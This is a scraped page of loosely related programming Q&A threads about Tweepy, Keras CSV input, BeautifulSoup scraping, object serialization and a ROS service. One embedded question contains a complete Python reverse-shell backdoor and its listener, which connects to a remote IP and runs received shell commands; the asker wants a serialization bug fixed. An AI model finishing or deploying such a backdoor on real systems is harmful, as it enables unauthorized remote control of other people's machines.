Does IOError: [Errno 2] No such file or directory: mean the file hasn't been written? - json

I'm using Tweepy for the first time. Currently getting this error
---------------------------------------------------------------------------
IOError Traceback (most recent call last)
<ipython-input-11-cdd7ebe0c00f> in <module>()
----> 1 data_json = io.open('raw_tweets.json', mode='r', encoding='utf-8').read() #reads in the JSON file
2 data_python = json.loads(data_json)
3
4 csv_out = io.open('tweets_out_utf8.csv', mode='w', encoding='utf-8') #opens csv file
IOError: [Errno 2] No such file or directory: 'raw_tweets.json'
I've got a feeling that the code I've got isn't working. For example print(status) doesn't print anything. Also I see no saved CSV or JSON file in the directory.
I'm a newbie so any help/documentation you can offer would be great!
import time
from tweepy import Stream
from tweepy import OAuthHandler
from tweepy.streaming import StreamListener
import os
import json
import csv
import io
from pymongo import MongoClient
ckey = 'blah'
consumer_secret = 'blah'
access_token_key = 'blah'
access_token_secret = 'blah'
#start_time = time.time() #grabs the system time
keyword_list = ['keyword'] #track list
#Listener Class Override
class listener(StreamListener):
def __init__(self, start_time, time_limit=60):
self.time = start_time
self.limit = time_limit
self.tweet_data = []
def on_data(self, data):
saveFile = io.open('raw_tweets.json', 'a', encoding='utf-8')
while (time.time() - self.time) < self.limit:
try:
self.tweet_data.append(data)
return True
except BaseException, e:
print 'failed ondata,', str(e)
time.sleep(5)
pass
saveFile = io.open('raw_tweets.json', 'w', encoding='utf-8')
saveFile.write(u'[\n')
saveFile.write(','.join(self.tweet_data))
saveFile.write(u'\n]')
saveFile.close()
exit()
def on_error(self, status):
print status
class listener(StreamListener):
def __init__(self, start_time, time_limit=10):
self.time = start_time
self.limit = time_limit
def on_data(self, data):
while (time.time() - self.time) < self.limit:
print(data)
try:
client = MongoClient('blah', 27017)
db = client['blah']
collection = db['blah']
tweet = json.loads(data)
collection.insert(tweet)
return True
except BaseException as e:
print('failed ondata,')
print(str(e))
time.sleep(5)
pass
exit()
def on_error(self, status):
print(status)
data_json = io.open('raw_tweets.json', mode='r', encoding='utf-8').read() #reads in the JSON file
data_python = json.loads(data_json)
csv_out = io.open('tweets_out_utf8.csv', mode='w', encoding='utf-8') #opens csv file
UPDATED: Creates file but file is empty
import tweepy
import datetime
auth = tweepy.OAuthHandler('xxx', 'xxx')
auth.set_access_token('xxx', 'xxx')
class listener(tweepy.StreamListener):
def __init__(self, timeout, file_name, *args, **kwargs):
super(listener, self).__init__(*args, **kwargs)
self.start_time = None
self.timeout = timeout
self.file_name = file_name
self.tweet_data = []
def on_data(self, data):
if self.start_time is None:
self.start_time = datetime.datetime.now()
while (datetime.datetime.now() - self.start_time).seconds < self.timeout:
with open(self.file_name, 'a') as data_file:
data_file.write('\n')
data_file.write(data)
def on_error(self, status):
print status
l = listener(60, 'stack_raw_tweets.json')
mstream = tweepy.Stream(auth=auth, listener=l)
mstream.filter(track=['python'], async=True)

You are not creating a Stream for the listener. The last but one line of the code below does that. Followed by that you have to start the Stream, which is the last line. I must warn you that storing this in mongodb is the right thing to do as the file that I am storing it seems to grow easily to several GB. Also the file is not exactly a json. Each line in the file is a json. You must tweak it to your needs.
import tweepy
import datetime
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_secret)
class listener(tweepy.StreamListener):
def __init__(self, timeout, file_name, *args, **kwargs):
super(listener, self).__init__(*args, **kwargs)
self.start_time = None
self.timeout = timeout
self.file_name = file_name
self.tweet_data = []
def on_data(self, data):
if self.start_time is None:
self.start_time = datetime.datetime.now()
while (datetime.datetime.now() - self.start_time).seconds < self.timeout:
with open(self.file_name, 'a') as data_file:
data_file.write('\n')
data_file.write(data)
def on_error(self, status):
print status
l = listener(60, 'raw_tweets.json')
mstream = tweepy.Stream(auth=auth, listener=l)
mstream.filter(track=['python'], async=True)

Related

I get this error i get this Error "Object of type bytes is not JSON serializable" while testing my reverse_backdoor aganist my real computer

I have python 2 on my VM and my code is as follows:
#!/usr/bin/env python
import socket, json
class Listener:
def __init__(self, ip, port):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind((ip, port))
listener.listen(0)
print("[+] Waiting for incoming connection")
self.connection, address = listener.accept()
print("[+] Got a connection from " + str(address))
def reliable_send(self, data):
json_data = json.dumps(data)
self.connection.send(json_data)
def reliable_recieve(self):
json_data = ""
while True:
try:
json_data = json_data + self.connection.recv(1024)
return json.loads(json_data)
except ValueError:
continue
def execute_remotely(self, command):
self.reliable_send(command)
return self.reliable_recieve()
def run(self):
while True:
command = raw_input(">> ")
result = self.execute_remotely(command)
print(result)
my_listener = Listener("ip adress", 4444)
my_listener.run()
And my target computer has python 3 and the code as follows:
#!/usr/bin/env python
import socket, subprocess
import json
class Backdoor:
def __init__(self, ip, port):
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connection.connect((ip, port))
def reliable_send(self, data):
json_data = json.dumps(data)
self.connection.send(json_data)
def reliable_recieve(self):
json_data = ""
while True:
try:
json_data = json_data + self.connection.recv(1024)
return json.loads(json_data)
except ValueError:
continue
def execute_system_command(self, command):
return subprocess.check_output(command, shell=True)
def run(self):
while True:
command = self.reliable_recieve()
command_result = self.execute_system_command(command)
self.reliable_send(command_result)
connection.close()
my_backdoor = Backdoor("ip address", 4444)
my_backdoor.run()
When I run this I get the error mentioned in the subject. I have tried to decode the json_data with the utf-8 argument but the problem persists.
i get this screen. The listener model is working in my VM but in my real pc its show this error
enter image description here
and if i decode my json_data its show the error "Object of type bytes is not JSON serializable"

Why the keras do not take my data from CSV

I am following the tutorial about import CVS data into tensorflow.
I followed every step.
How ever it does not works out.
It showed that one of my feature is not in the dictionary.
If so, how can i put it into dictionary
The link to my colab
The code is write below and the error information is written in the end
import functools
import numpy as np
import tensorflow as tf
import tensorflow_datasets as tfds
train_file_path = "/content/Productivity training.csv"
test_file_path = "/content/Productivity Testing.csv"
LABEL_COLUMN = 'Productivity'
def get_dataset(file_path):
dataset = tf.data.experimental.make_csv_dataset(
file_path,
batch_size=12,
label_name=LABEL_COLUMN,
na_value="?",
num_epochs=1,
ignore_errors=True)
return dataset
raw_train_data = get_dataset(train_file_path)
raw_test_data = get_dataset(test_file_path)
examples, labels = next(iter(raw_train_data)) # 第一个批次
print("EXAMPLES: \n", examples, "\n")
print("LABELS: \n", labels)
CATEGORIES = {
'over working hours': ['0', '2'],
'experience' : ['0.5', '0.75', '1'],
'absent' : ['0.5', '0.25', '0']
}
categorical_columns = []
for feature, vocab in CATEGORIES.items():
cat_col = tf.feature_column.categorical_column_with_vocabulary_list(
key=feature, vocabulary_list=vocab)
categorical_columns.append(tf.feature_column.indicator_column(cat_col))
def process_continuous_data(mean, data):
# 标准化数据
data = tf.cast(data, tf.float32) * 1/(2*mean)
return tf.reshape(data, [-1, 1])
MEANS = {
'Weekday' : 4,
'highest' : 9.2540,
'lowest' : 3.47,
'Weather' : 2.63,
'Wind speed': 2.31
}
numerical_columns = []
for feature in MEANS.keys():
num_col = tf.feature_column.numeric_column(feature, normalizer_fn=functools.partial(process_continuous_data, MEANS[feature]))
numerical_columns.append(num_col)
preprocessing_layer = tf.keras.layers.DenseFeatures(categorical_columns+numerical_columns)
model = tf.keras.Sequential([
preprocessing_layer,
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dense(1, activation='sigmoid'),
])
model.compile(
loss='binary_crossentropy',
optimizer='adam',
metrics=['accuracy'])
train_data = raw_train_data
test_data = raw_test_data
model.fit(train_data, epochs=20)
Here is the error info:
/usr/local/lib/python3.7/dist-packages/tensorflow/python/framework/func_graph.py in wrapper(*args, **kwargs)
975 except Exception as e: # pylint:disable=broad-except
976 if hasattr(e, "ag_error_metadata"):
--> 977 raise e.ag_error_metadata.to_exception(e)
978 else:
979 raise
ValueError: in user code:
/usr/local/lib/python3.7/dist-packages/tensorflow/python/keras/engine/training.py:805 train_function *
return step_function(self, iterator)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/keras/engine/training.py:795 step_function **
outputs = model.distribute_strategy.run(run_step, args=(data,))
/usr/local/lib/python3.7/dist-packages/tensorflow/python/distribute/distribute_lib.py:1259 run
return self._extended.call_for_each_replica(fn, args=args, kwargs=kwargs)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/distribute/distribute_lib.py:2730 call_for_each_replica
return self._call_for_each_replica(fn, args, kwargs)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/distribute/distribute_lib.py:3417 _call_for_each_replica
return fn(*args, **kwargs)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/keras/engine/training.py:788 run_step **
outputs = model.train_step(data)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/keras/engine/training.py:754 train_step
y_pred = self(x, training=True)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/keras/engine/base_layer.py:1012 __call__
outputs = call_fn(inputs, *args, **kwargs)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/keras/engine/sequential.py:389 call
outputs = layer(inputs, **kwargs)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/keras/engine/base_layer.py:1012 __call__
outputs = call_fn(inputs, *args, **kwargs)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/keras/feature_column/dense_features.py:169 call **
self._state_manager)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/feature_column/feature_column_v2.py:2592 get_dense_tensor
return transformation_cache.get(self, state_manager)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/feature_column/feature_column_v2.py:2355 get
transformed = column.transform_feature(self, state_manager)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/feature_column/feature_column_v2.py:2564 transform_feature
input_tensor = transformation_cache.get(self.key, state_manager)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/feature_column/feature_column_v2.py:2339 get
raise ValueError('Feature {} is not in features dictionary.'.format(key))
ValueError: Feature Weather is not in features dictionary.

Beautifulsoup find method returns not subscriptable object

I was trying to create a Twitter scraper using beautifulsoup, request, and json. However, when I tried to run the code, it raised the error object is not subscriptable. I checked the lines where the error is located, but I couldn't find what raises the error. Can someone please help? I couldn't fix it.
File "tweetscraper.py", line 131, in <module>
start()
File "tweetscraper.py", line 125, in start
tweets = get_tweets_data(username, soup)
File "tweetscraper.py", line 54, in get_tweets_data
next_pointer = soup.find("div", {"class": "stream-container"})["data-min-position"]
TypeError: 'NoneType' object is not subscriptable
Here is my code:
def get_tweet_text(tweet):
tweet_text_box = tweet.find("p", {"class": "TweetTextSize TweetTextSize--normal js-tweet-text tweet-text"})
images_in_tweet_tag = tweet_text_box.find_all("a", {"class": "twitter-timeline-link u-hidden"})
tweet_text = tweet_text_box.text
for image_in_tweet_tag in images_in_tweet_tag:
tweet_text = tweet_text.replace(image_in_tweet_tag.text, '')
return tweet_text
def get_this_page_tweets(soup):
tweets_list = list()
tweets = soup.find_all("li", {"data-item-type": "tweet"})
for tweet in tweets:
tweet_data = None
try:
tweet_data = get_tweet_text(tweet)
except Exception as e:
continue
#ignore if there is any loading or tweet error
if tweet_data:
tweets_list.append(tweet_data)
print(".", end="")
sys.stdout.flush()
return tweets_list
def get_tweets_data(username, soup):
tweets_list = list()
tweets_list.extend(get_this_page_tweets(soup))
next_pointer = soup.find("div", {"class": "stream-container"})["data-min-position"]
while True:
next_url = "https://twitter.com/i/profiles/show/" + username + \
"/timeline/tweets?include_available_features=1&" \
"include_entities=1&max_position=" + next_pointer + "&reset_error_state=false"
next_response = None
try:
next_response = requests.get(next_url)
except Exception as e:
# in case there is some issue with request. None encountered so far.
print(e)
return tweets_list
tweets_data = next_response.text
tweets_obj = json.loads(tweets_data)
if not tweets_obj["has_more_items"] and not tweets_obj["min_position"]:
# using two checks here bcz in one case has_more_items was false but there were more items
print("\nNo more tweets returned")
break
next_pointer = tweets_obj["min_position"]
html = tweets_obj["items_html"]
soup = BeautifulSoup(html, 'lxml')
tweets_list.extend(get_this_page_tweets(soup))
return tweets_list
# dump final result in a json file
def dump_data(username, tweets):
filename = username+"_twitter.json"
print("\nDumping data in file " + filename)
data = dict()
data["tweets"] = tweets
with open(filename, 'w') as fh:
fh.write(json.dumps(data))
return filename
def get_username():
# if username is not passed
if len(sys.argv) < 2:
usage()
username = sys.argv[1].strip().lower()
if not username:
usage()
return username
def start(username = None):
username = get_username()
url = "http://www.twitter.com/" + username
print("\n\nDownloading tweets for " + username)
response = None
try:
response = requests.get(url)
except Exception as e:
print(repr(e))
sys.exit(1)
if response.status_code != 200:
print("Non success status code returned "+str(response.status_code))
sys.exit(1)
soup = BeautifulSoup(response.text, 'lxml')
if soup.find("div", {"class": "errorpage-topbar"}):
print("\n\n Error: Invalid username.")
sys.exit(1)
tweets = get_tweets_data(username, soup)
# dump data in a text file
dump_data(username, tweets)
print(str(len(tweets))+" tweets dumped.")
start()
The method find() will only return the first occurrence that is matched from the website data. This is a single object returned. Whereas, the method find_all() will return all the occurrences that are matched to the condition specified. So the method find_all() returns a list that is subscriptable.
Find out more about this in the Beautiful Soup Documentation.

Save Nested Objects to File in Python3

How can I save this structure of Python objects into a file (preferably JSON)? And how can I load this structure from the file again?
class Nested(object):
def __init__(self, n):
self.name = "Nested Object: " + str(n)
self.state = 3.14159265359
class Nest(object):
def __init__(self):
self.x = 1
self.y = 2
self.objects = []
tree = []
tree.append(Nest())
tree.append(Nest())
tree.append(Nest())
tree[0].objects.append(Nested(1))
tree[0].objects.append(Nested(2))
tree[1].objects.append(Nested(1))
tree[2].objects.append(Nested(7))
tree[2].objects.append(Nested(8))
tree[2].objects.append(Nested(9))
Thanks to the reference to "pickle" I found a well working very simple solution to save my array of objects:
pickle
import pickle
pickle.dump( tree, open( "save.p", "wb" ) )
loaded_objects = pickle.load( open( "save.p", "rb" ) )
jsonpickle
import jsonpickle
frozen = jsonpickle.encode(tree)
with open("save.json", "w") as text_file:
print(frozen, file=text_file)
file = open("save.json", "r")
loaded_objects = jsonpickle.decode(file.read())
If you don't want pickle, nor want to use an external library you can always do it the hard way:
import json
class NestEncoder(json.JSONEncoder):
def default(self, obj):
entry = dict(obj.__dict__)
entry['__class__'] = obj.__class__.__name__
return entry
class NestDecoder(json.JSONDecoder):
def __init__(self):
json.JSONDecoder.__init__(self, object_hook=self.dict_to_object)
def dict_to_object(self, dictionary):
if dictionary.get("__class__") == "Nested":
obj = Nested.__new__(Nested)
elif dictionary.get("__class__") == "Nest":
obj = Nest.__new__(Nest)
else:
return dictionary
for key, value in dictionary.items():
if key != '__class__':
setattr(obj, key, value)
return obj
with open('nest.json', 'w') as file:
json.dump(tree, file, cls=NestEncoder)
with open('nest.json', 'r') as file:
tree2 = json.load(file, cls=NestDecoder)
print("Smoke test:")
print(tree[0].objects[0].name)
print(tree2[0].objects[0].name)
Assigning the the attributes to the classes doesn't have to be done dynamically with setattr() you can also do it manually.
There are probably plenty of pitfalls with doing it like this, so be careful.

ROS service failed to save files

I want to have a service 'save_readings' that automatically saves data from a rostopic into a file. But each time the service gets called, it doesn't save any file.
I've tried to run those saving-file code in python without using a rosservice and the code works fine.
I don't understand why this is happening.
#!/usr/bin/env python
# license removed for brevity
import rospy,numpy
from std_msgs.msg import String,Int32MultiArray,Float32MultiArray,Bool
from std_srvs.srv import Empty,EmptyResponse
import geometry_msgs.msg
from geometry_msgs.msg import WrenchStamped
import json
# import settings
pos_record = []
wrench_record = []
def ftmsg2listandflip(ftmsg):
return [ftmsg.wrench.force.x,ftmsg.wrench.force.y,ftmsg.wrench.force.z, ftmsg.wrench.torque.x,ftmsg.wrench.torque.y,ftmsg.wrench.torque.z]
def callback_pos(data):
global pos_record
pos_record.append(data.data)
def callback_wrench(data):
global wrench_record
ft = ftmsg2listandflip(data)
wrench_record.append([data.header.stamp.to_sec()] + ft)
def exp_listener():
stop_sign = False
rospy.Subscriber("stage_pos", Float32MultiArray, callback_pos)
rospy.Subscriber("netft_data", WrenchStamped, callback_wrench)
rospy.spin()
def start_read(req):
global pos_record
global wrench_record
pos_record = []
wrench_record = []
return EmptyResponse()
def save_readings(req):
global pos_record
global wrench_record
filename = rospy.get_param('save_file_name')
output_data = {'pos_list':pos_record, 'wrench_list': wrench_record }
rospy.loginfo("output_data %s",output_data)
with open(filename, 'w') as outfile: # write data to 'data.json'
print('dumping json file')
json.dump(output_data, outfile) #TODO: find out why failing to save the file.
outfile.close()
print("file saved")
rospy.sleep(2)
return EmptyResponse()
if __name__ == '__main__':
try:
rospy.init_node('lisener_node', log_level = rospy.INFO)
s_1 = rospy.Service('start_read', Empty, start_read)
s_1 = rospy.Service('save_readings', Empty, save_readings)
exp_listener()
print ('mylistener ready!')
except rospy.ROSInterruptException:
pass
Got it. I need to specify a path for the file to be saved.
save_path = '/home/user/catkin_ws/src/motionstage/'
filename = save_path + filename